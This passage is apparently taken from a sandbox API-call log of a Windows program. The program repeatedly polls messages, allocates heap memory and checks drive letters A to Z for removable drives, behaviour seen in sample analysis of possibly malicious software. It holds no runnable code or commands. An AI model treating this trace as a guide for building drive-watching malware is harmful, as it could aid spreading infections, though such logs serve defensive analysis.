lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.877] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0219.877] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0219.877] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.877] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0219.877] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.877] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0219.877] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0219.877] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.877] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0219.877] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.877] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.877] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0219.877] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.877] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.877] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.877] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.877] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0219.877] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0219.877] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0219.877] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.878] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.878] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.878] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.878] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.878] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.879] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.879] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.879] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.879] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.880] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.880] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.880] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.880] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.880] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.881] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.881] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.881] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.881] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.881] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.882] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.882] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.882] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.882] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.883] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.883] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.883] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.883] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0219.883] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.883] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.884] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.884] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.884] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0219.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0219.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0219.884] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.884] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7b0 [0219.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0219.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0219.884] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0219.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.885] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.885] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0219.885] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0219.885] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0219.885] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0219.885] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0219.885] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.885] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0219.885] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.885] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0219.885] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.885] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0219.885] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.885] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.885] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.885] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0219.886] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.886] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.886] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.886] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0219.886] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0219.886] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.886] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0219.886] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0219.886] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.886] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0219.886] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.886] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0219.886] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0219.886] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.886] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0219.886] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.886] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0219.886] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0219.887] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.887] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0219.887] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0219.887] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0219.887] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0219.887] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0219.887] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0219.887] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.887] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.887] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.887] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.887] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.888] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.888] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.888] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.888] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.889] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.889] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.889] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.889] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.889] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.889] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.890] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.890] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.890] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.890] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.890] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.891] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.891] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.891] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.891] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.891] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.891] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.892] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.892] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0219.892] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0219.892] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.892] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0219.892] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.892] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0219.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.892] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0219.892] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0219.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.892] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0219.894] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0219.894] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.894] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.895] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.895] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0219.895] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.895] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0219.895] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0219.895] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0219.895] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0219.895] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0219.895] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0219.895] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0219.896] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.896] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0219.896] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.896] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0219.896] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.896] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.896] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.896] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.896] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.896] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.896] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.896] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.896] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.896] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0219.896] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0219.896] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.896] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0219.896] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0219.896] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.896] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0219.896] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.896] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0219.896] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.897] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.897] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0219.897] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.897] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.897] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0219.897] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.897] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0219.897] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.897] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.897] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0219.897] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0219.897] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0219.897] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.897] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.897] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.898] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.898] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.898] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.898] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.898] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.898] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.899] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.899] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.899] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.899] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.899] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.900] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.900] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.900] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.900] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.900] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.900] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.901] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.901] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.901] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.901] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.901] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.901] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.902] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.902] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0219.902] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0219.902] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.902] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.902] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.902] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0219.902] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.902] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.902] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0219.902] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0219.902] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.902] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.902] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.902] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0219.902] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.902] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0219.902] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260c0 [0219.902] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0219.902] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.902] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.903] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0219.903] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260c0 | out: hHeap=0x12c0000) returned 1 [0219.903] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0219.903] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0219.903] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0219.903] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.903] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0219.903] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.903] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.903] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.903] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0219.903] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.903] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.903] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.903] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, 